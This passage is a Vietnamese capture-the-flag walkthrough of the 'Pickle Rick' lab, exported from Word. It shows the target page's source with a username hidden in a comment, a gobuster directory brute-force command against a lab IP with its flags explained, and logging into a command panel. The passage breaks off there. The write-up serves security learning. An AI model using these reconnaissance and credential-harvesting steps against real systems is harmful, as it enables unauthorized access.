kGhuoDyskSH0cvdO3tZ0A3fCh7VA0jdNAs1seKCPNtAWHAaLswrw93v7MZ5kR17OWpqXgvtfO4GK
|
||
M/PdkiAv8/PzOGBpcX7xdUoLfOnZvPTYXbMCurGcXgcnkxnjgzmaGqF5ptFexqrkElZS7YLLgMfF
|
||
KvRzTI+DVMtlCqOhciLc2UcnI3gkOCrsqXsW6AYZBlLwPRxnS8xfqbGPjZkWlrsAuk5SPfE6UE8D
|
||
mTQ0PB5x4l+uU9TpiVv8AQAA//8DAFBLAwQUAAYACAAAACEAfLo35+EAAAALAQAADwAAAGRycy9k
|
||
b3ducmV2LnhtbEyPQUvDQBCF74L/YRnBW7uJJaGN2ZRUEERBaCyit212mgSzszG7beO/d3rS2zze
|
||
x5v38vVke3HC0XeOFMTzCARS7UxHjYLd2+NsCcIHTUb3jlDBD3pYF9dXuc6MO9MWT1VoBIeQz7SC
|
||
NoQhk9LXLVrt525AYu/gRqsDy7GRZtRnDre9vIuiVFrdEX9o9YAPLdZf1dEqeN8mB9xs0p18/Sy/
|
||
y7h6ml6eP5S6vZnKexABp/AHw6U+V4eCO+3dkYwXPetkwaSC2TKJQTCwWkQpiD07fKxAFrn8v6H4
|
||
BQAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABbQ29u
|
||
dGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAAlAEAAAsAAAAAAAAAAAAAAAAA
|
||
LwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAOztjFRpAgAAKgUAAA4AAAAAAAAAAAAAAAAA
|
||
LgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAHy6N+fhAAAACwEAAA8AAAAAAAAAAAAA
|
||
AAAAwwQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAADRBQAAAAA=
|
||
" filled="f" strokecolor="#1f3763 [1604]" strokeweight="1pt"/><![endif]--><![if !vml]><span
|
||
style='mso-ignore:vglayout'>
|
||
|
||
<table cellpadding=0 cellspacing=0 align=left>
|
||
<tr>
|
||
<td width=19 height=562></td>
|
||
</tr>
|
||
<tr>
|
||
<td></td>
|
||
<td width=770 height=1167 style='border:1.0pt solid #1F3763;vertical-align:
|
||
top'><![endif]><![if !mso]><span style='position:absolute;mso-ignore:vglayout;
|
||
left:0pt;z-index:251659264'>
|
||
<table cellpadding=0 cellspacing=0 width="100%">
|
||
<tr>
|
||
<td><![endif]>
|
||
<div v:shape="Rectangle_x0020_12" style='padding:4.6pt 8.2pt 4.6pt 8.2pt'
|
||
class=shape>
|
||
<p class=MsoNormal style='line-height:12.0pt'><span style='font-size:10.0pt;
|
||
color:black;mso-themecolor:text1'><!DOCTYPE html><o:p></o:p></span></p>
|
||
<p class=MsoNormal style='line-height:12.0pt'><span style='font-size:10.0pt;
|
||
color:black;mso-themecolor:text1'><html lang="en"><o:p></o:p></span></p>
|
||
<p class=MsoNormal style='line-height:12.0pt'><span style='font-size:10.0pt;
|
||
color:black;mso-themecolor:text1'><head><o:p></o:p></span></p>
|
||
<p class=MsoNormal style='line-height:12.0pt'><span style='font-size:10.0pt;
|
||
color:black;mso-themecolor:text1'><span style='mso-spacerun:yes'>
|
||
</span><title>Rick is sup4r cool</title><o:p></o:p></span></p>
|
||
<p class=MsoNormal style='line-height:12.0pt'><span style='font-size:10.0pt;
|
||
color:black;mso-themecolor:text1'><span style='mso-spacerun:yes'>
|
||
</span><meta charset="utf-8"><o:p></o:p></span></p>
|
||
<p class=MsoNormal style='line-height:12.0pt'><span style='font-size:10.0pt;
|
||
color:black;mso-themecolor:text1'><span style='mso-spacerun:yes'>
|
||
</span><meta name="viewport" content="width=device-width,
|
||
initial-scale=1"><o:p></o:p></span></p>
|
||
<p class=MsoNormal style='line-height:12.0pt'><span style='font-size:10.0pt;
|
||
color:black;mso-themecolor:text1'><span style='mso-spacerun:yes'>
|
||
</span><link rel="stylesheet"
|
||
href="assets/bootstrap.min.css"><o:p></o:p></span></p>
|
||
<p class=MsoNormal style='line-height:12.0pt'><span style='font-size:10.0pt;
|
||
color:black;mso-themecolor:text1'><span style='mso-spacerun:yes'>
|
||
</span><script src="assets/jquery.min.js"></script><o:p></o:p></span></p>
|
||
<p class=MsoNormal style='line-height:12.0pt'><span style='font-size:10.0pt;
|
||
color:black;mso-themecolor:text1'><span style='mso-spacerun:yes'>
|
||
</span><script
|
||
src="assets/bootstrap.min.js"></script><o:p></o:p></span></p>
|
||
<p class=MsoNormal style='line-height:12.0pt'><span style='font-size:10.0pt;
|
||
color:black;mso-themecolor:text1'><span style='mso-spacerun:yes'>
|
||
</span><style><o:p></o:p></span></p>
|
||
<p class=MsoNormal style='line-height:12.0pt'><span style='font-size:10.0pt;
|
||
color:black;mso-themecolor:text1'><span style='mso-spacerun:yes'>
|
||
</span>.jumbotron {<o:p></o:p></span></p>
|
||
<p class=MsoNormal style='line-height:12.0pt'><span style='font-size:10.0pt;
|
||
color:black;mso-themecolor:text1'><span style='mso-spacerun:yes'>
|
||
</span>background-image: url("assets/rickandmorty.jpeg");<o:p></o:p></span></p>
|
||
<p class=MsoNormal style='line-height:12.0pt'><span style='font-size:10.0pt;
|
||
color:black;mso-themecolor:text1'><span style='mso-spacerun:yes'>
|
||
</span>background-size: cover;<o:p></o:p></span></p>
|
||
<p class=MsoNormal style='line-height:12.0pt'><span style='font-size:10.0pt;
|
||
color:black;mso-themecolor:text1'><span style='mso-spacerun:yes'>
|
||
</span>height: 340px;<o:p></o:p></span></p>
|
||
<p class=MsoNormal style='line-height:12.0pt'><span style='font-size:10.0pt;
|
||
color:black;mso-themecolor:text1'><span style='mso-spacerun:yes'> </span>}<o:p></o:p></span></p>
|
||
<p class=MsoNormal style='line-height:12.0pt'><span style='font-size:10.0pt;
|
||
color:black;mso-themecolor:text1'><span style='mso-spacerun:yes'>
|
||
</span></style><o:p></o:p></span></p>
|
||
<p class=MsoNormal style='line-height:12.0pt'><span style='font-size:10.0pt;
|
||
color:black;mso-themecolor:text1'></head><o:p></o:p></span></p>
|
||
<p class=MsoNormal style='line-height:12.0pt'><span style='font-size:10.0pt;
|
||
color:black;mso-themecolor:text1'><body><o:p></o:p></span></p>
|
||
<p class=MsoNormal style='line-height:12.0pt'><span style='font-size:10.0pt;
|
||
color:black;mso-themecolor:text1'><span style='mso-spacerun:yes'>
|
||
</span><div class="container"><o:p></o:p></span></p>
|
||
<p class=MsoNormal style='line-height:12.0pt'><span style='font-size:10.0pt;
|
||
color:black;mso-themecolor:text1'><span style='mso-spacerun:yes'>
|
||
</span><div class="jumbotron"></div><o:p></o:p></span></p>
|
||
<p class=MsoNormal style='line-height:12.0pt'><span style='font-size:10.0pt;
|
||
color:black;mso-themecolor:text1'><span style='mso-spacerun:yes'>
|
||
</span><h1>Help Morty!</h1></br><o:p></o:p></span></p>
|
||
<p class=MsoNormal style='line-height:12.0pt'><span style='font-size:10.0pt;
|
||
color:black;mso-themecolor:text1'><span style='mso-spacerun:yes'>
|
||
</span><p>Listen Morty... I need your help, I've turned myself into a
|
||
pickle again and this time I can't change back!</p></br><o:p></o:p></span></p>
|
||
<p class=MsoNormal style='line-height:12.0pt'><span style='font-size:10.0pt;
|
||
color:black;mso-themecolor:text1'><span style='mso-spacerun:yes'>
|
||
</span><p>I need you to <b>*BURRRP*</b>....Morty, logon
|
||
to my computer and find the last three secret ingredients to finish my
|
||
pickle-reverse potion. The only problem is,<o:p></o:p></span></p>
|
||
<p class=MsoNormal style='line-height:12.0pt'><span style='font-size:10.0pt;
|
||
color:black;mso-themecolor:text1'><span style='mso-spacerun:yes'>
|
||
</span>I have no idea what the <b>*BURRRRRRRRP*</b>, password
|
||
was! Help Morty, Help!</p></br><o:p></o:p></span></p>
|
||
<p class=MsoNormal style='line-height:12.0pt'><span style='font-size:10.0pt;
|
||
color:black;mso-themecolor:text1'><span style='mso-spacerun:yes'>
|
||
</span></div><o:p></o:p></span></p>
|
||
<p class=MsoNormal style='line-height:12.0pt'><span style='font-size:10.0pt;
|
||
color:#00B050'><span style='mso-spacerun:yes'> </span><!--<o:p></o:p></span></p>
|
||
<p class=MsoNormal style='line-height:12.0pt'><span style='font-size:10.0pt;
|
||
color:#00B050'><span style='mso-spacerun:yes'> </span>Note to self,
|
||
remember username!<o:p></o:p></span></p>
|
||
<p class=MsoNormal style='line-height:12.0pt'><span style='font-size:10.0pt;
|
||
color:#00B050'><span style='mso-spacerun:yes'> </span>Username:
|
||
R1ckRul3s<o:p></o:p></span></p>
|
||
<p class=MsoNormal style='line-height:12.0pt'><span style='font-size:10.0pt;
|
||
color:#00B050'><span style='mso-spacerun:yes'> </span>--><o:p></o:p></span></p>
|
||
<p class=MsoNormal style='line-height:12.0pt'><span style='font-size:10.0pt;
|
||
color:black;mso-themecolor:text1'></body><o:p></o:p></span></p>
|
||
<p class=MsoNormal style='line-height:12.0pt'><span style='font-size:10.0pt;
|
||
color:black;mso-themecolor:text1'></html><o:p></o:p></span></p>
|
||
</div>
|
||
<![if !mso]></td>
|
||
</tr>
|
||
</table>
|
||
</span><![endif]><![if !mso & !vml]> <![endif]><![if !vml]></td>
|
||
</tr>
|
||
</table>
|
||
|
||
</span><![endif]><span style='font-size:13.0pt;line-height:107%;font-family:
|
||
"Calibri Light",sans-serif;mso-ascii-theme-font:major-latin;mso-hansi-theme-font:
|
||
major-latin;mso-bidi-theme-font:major-latin'><o:p> </o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p> </o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p> </o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p> </o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p> </o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p> </o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p> </o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p> </o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p> </o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p> </o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p> </o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p> </o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p> </o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p> </o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p> </o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p> </o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p> </o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p> </o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p> </o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p> </o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p> </o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p> </o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p> </o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p> </o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p> </o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p> </o:p></span></p>
|
||
|
||
<br style='mso-ignore:vglayout' clear=ALL>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Phần
|
||
màu xanh lá ở trên là comment trên front end code, đây có thể
|
||
là user dùng để đăng nhập lên chính trang web hoặc
|
||
là dùng đăng nhập SSH. Nhưng tạm thời thì cứ
|
||
để đây và tiếp tục tìm kiếm các thông tin
|
||
khác như các dir ẩn.<o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Thực
|
||
hiên chạy lệnh: <o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin;
|
||
color:red'>gobuster dir -w common-web-content.txt -u 10.10.176.127 -t 25 -x
|
||
txt,php,py,sh<o:p></o:p></span></p>
|
||
|
||
<p class=MsoListParagraphCxSpFirst style='text-indent:-.25in;mso-list:l4 level1 lfo1'><![if !supportLists]><span
|
||
style='font-size:13.0pt;line-height:107%;font-family:Symbol;mso-fareast-font-family:
|
||
Symbol;mso-bidi-font-family:Symbol'><span style='mso-list:Ignore'>·<span
|
||
style='font:7.0pt "Times New Roman"'> </span></span></span><![endif]><span
|
||
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
|
||
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
|
||
major-latin'>gobuster: tên lệnh<o:p></o:p></span></p>
|
||
|
||
<p class=MsoListParagraphCxSpMiddle style='text-indent:-.25in;mso-list:l4 level1 lfo1'><![if !supportLists]><span
|
||
style='font-size:13.0pt;line-height:107%;font-family:Symbol;mso-fareast-font-family:
|
||
Symbol;mso-bidi-font-family:Symbol'><span style='mso-list:Ignore'>·<span
|
||
style='font:7.0pt "Times New Roman"'> </span></span></span><![endif]><span
|
||
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
|
||
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
|
||
major-latin'>dir: chế độ tìm file ẩn<o:p></o:p></span></p>
|
||
|
||
<p class=MsoListParagraphCxSpMiddle style='text-indent:-.25in;mso-list:l4 level1 lfo1'><![if !supportLists]><span
|
||
style='font-size:13.0pt;line-height:107%;font-family:Symbol;mso-fareast-font-family:
|
||
Symbol;mso-bidi-font-family:Symbol'><span style='mso-list:Ignore'>·<span
|
||
style='font:7.0pt "Times New Roman"'> </span></span></span><![endif]><span
|
||
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
|
||
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
|
||
major-latin'>-u: url của server nạn nhân<o:p></o:p></span></p>
|
||
|
||
<p class=MsoListParagraphCxSpMiddle style='text-indent:-.25in;mso-list:l4 level1 lfo1'><![if !supportLists]><span
|
||
style='font-size:13.0pt;line-height:107%;font-family:Symbol;mso-fareast-font-family:
|
||
Symbol;mso-bidi-font-family:Symbol'><span style='mso-list:Ignore'>·<span
|
||
style='font:7.0pt "Times New Roman"'> </span></span></span><![endif]><span
|
||
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
|
||
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
|
||
major-latin'>-w: tên wordlist cần dùng<o:p></o:p></span></p>
|
||
|
||
<p class=MsoListParagraphCxSpMiddle style='text-indent:-.25in;mso-list:l4 level1 lfo1'><![if !supportLists]><span
|
||
style='font-size:13.0pt;line-height:107%;font-family:Symbol;mso-fareast-font-family:
|
||
Symbol;mso-bidi-font-family:Symbol'><span style='mso-list:Ignore'>·<span
|
||
style='font:7.0pt "Times New Roman"'> </span></span></span><![endif]><span
|
||
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
|
||
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
|
||
major-latin'>-x: những extension muốn tìm (thường với
|
||
website linux sẽ là txt, php, php5, py, rb, pl, sh)<o:p></o:p></span></p>
|
||
|
||
<p class=MsoListParagraphCxSpLast style='text-indent:-.25in;mso-list:l4 level1 lfo1'><![if !supportLists]><span
|
||
style='font-size:13.0pt;line-height:107%;font-family:Symbol;mso-fareast-font-family:
|
||
Symbol;mso-bidi-font-family:Symbol'><span style='mso-list:Ignore'>·<span
|
||
style='font:7.0pt "Times New Roman"'> </span></span></span><![endif]><span
|
||
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
|
||
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
|
||
major-latin'>-t: số threads chạy trong 1 giây<o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal align=center style='text-align:center'><span
|
||
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
|
||
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
|
||
major-latin;mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_13"
|
||
o:spid="_x0000_i1047" type="#_x0000_t75" alt="A computer screen capture Description automatically generated with low confidence"
|
||
style='width:349.2pt;height:247.2pt;visibility:visible;mso-wrap-style:square'>
|
||
<v:imagedata src="Khai%20thác%20Pickle%20Rick%20_files/image017.png" o:title="A computer screen capture Description automatically generated with low confidence"/>
|
||
</v:shape><![endif]--><![if !vml]><img border=0 width=466 height=330
|
||
src="Khai%20thác%20Pickle%20Rick%20_files/image018.png"
|
||
alt="A computer screen capture Description automatically generated with low confidence"
|
||
v:shapes="Picture_x0020_13"><![endif]></span><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Có
|
||
thể nhận thấy 2 đường dẫn trả về
|
||
status 200. Tiến hành truy cập 2 trang này.<o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Với
|
||
url đầu tiên:<o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal align=center style='text-align:center'><span
|
||
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
|
||
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
|
||
major-latin;mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_14"
|
||
o:spid="_x0000_i1046" type="#_x0000_t75" alt="Graphical user interface, text Description automatically generated"
|
||
style='width:414pt;height:68.4pt;visibility:visible;mso-wrap-style:square'>
|
||
<v:imagedata src="Khai%20thác%20Pickle%20Rick%20_files/image019.png" o:title="Graphical user interface, text Description automatically generated"/>
|
||
</v:shape><![endif]--><![if !vml]><img border=0 width=552 height=91
|
||
src="Khai%20thác%20Pickle%20Rick%20_files/image020.png"
|
||
alt="Graphical user interface, text Description automatically generated"
|
||
v:shapes="Picture_x0020_14"><![endif]></span><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Đây
|
||
có thể là password cho username vừa tìm được hồi
|
||
nảy.<o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Với
|
||
cái thứ 2, chúng ta được một nơi như là
|
||
chỗ để đăng nhập:<o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal align=center style='text-align:center'><span
|
||
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
|
||
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
|
||
major-latin;mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_15"
|
||
o:spid="_x0000_i1045" type="#_x0000_t75" alt="Diagram Description automatically generated with medium confidence"
|
||
style='width:184.8pt;height:200.4pt;visibility:visible;mso-wrap-style:square'>
|
||
<v:imagedata src="Khai%20thác%20Pickle%20Rick%20_files/image021.png" o:title="Diagram Description automatically generated with medium confidence"/>
|
||
</v:shape><![endif]--><![if !vml]><img border=0 width=246 height=267
|
||
src="Khai%20thác%20Pickle%20Rick%20_files/image022.png"
|
||
alt="Diagram Description automatically generated with medium confidence"
|
||
v:shapes="Picture_x0020_15"><![endif]></span><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Đăng
|
||
nhập thành công thì được một nơi như thế
|
||
này:<o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal align=center style='text-align:center'><span
|
||
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
|
||
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
|
||
major-latin;mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_16"
|
||
o:spid="_x0000_i1044" type="#_x0000_t75" alt="Graphical user interface, text, application Description automatically generated"
|
||
style='width:286.8pt;height:139.8pt;visibility:visible;mso-wrap-style:square'>
|
||
<v:imagedata src="Khai%20thác%20Pickle%20Rick%20_files/image023.png" o:title="Graphical user interface, text, application Description automatically generated"/>
|
||
</v:shape><![endif]--><![if !vml]><img border=0 width=382 height=186
|
||
src="Khai%20thác%20Pickle%20Rick%20_files/image024.png"
|
||
alt="Graphical user interface, text, application Description automatically generated"
|
||
v:shapes="Picture_x0020_16"><![endif]></span><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Đến
|
||
đây thì test thử một cài câu lệnh xem cái Command Panel
|
||
này hoạt động như thế nào.<o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal align=center style='text-align:center'><span
|
||
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
|
||
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
|
||
major-latin;mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_17"
|
||
o:spid="_x0000_i1043" type="#_x0000_t75" alt="Table Description automatically generated"
|
||
style='width:278.4pt;height:184.8pt;visibility:visible;mso-wrap-style:square'>
|
||
<v:imagedata src="Khai%20thác%20Pickle%20Rick%20_files/image025.png" o:title="Table Description automatically generated"/>
|
||
</v:shape><![endif]--><![if !vml]><img border=0 width=371 height=246
|
||
src="Khai%20thác%20Pickle%20Rick%20_files/image026.png"
|
||
alt="Table Description automatically generated" v:shapes="Picture_x0020_17"><![endif]></span><span
|
||
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
|
||
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
|
||
major-latin'><o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal align=center style='text-align:center'><span
|
||
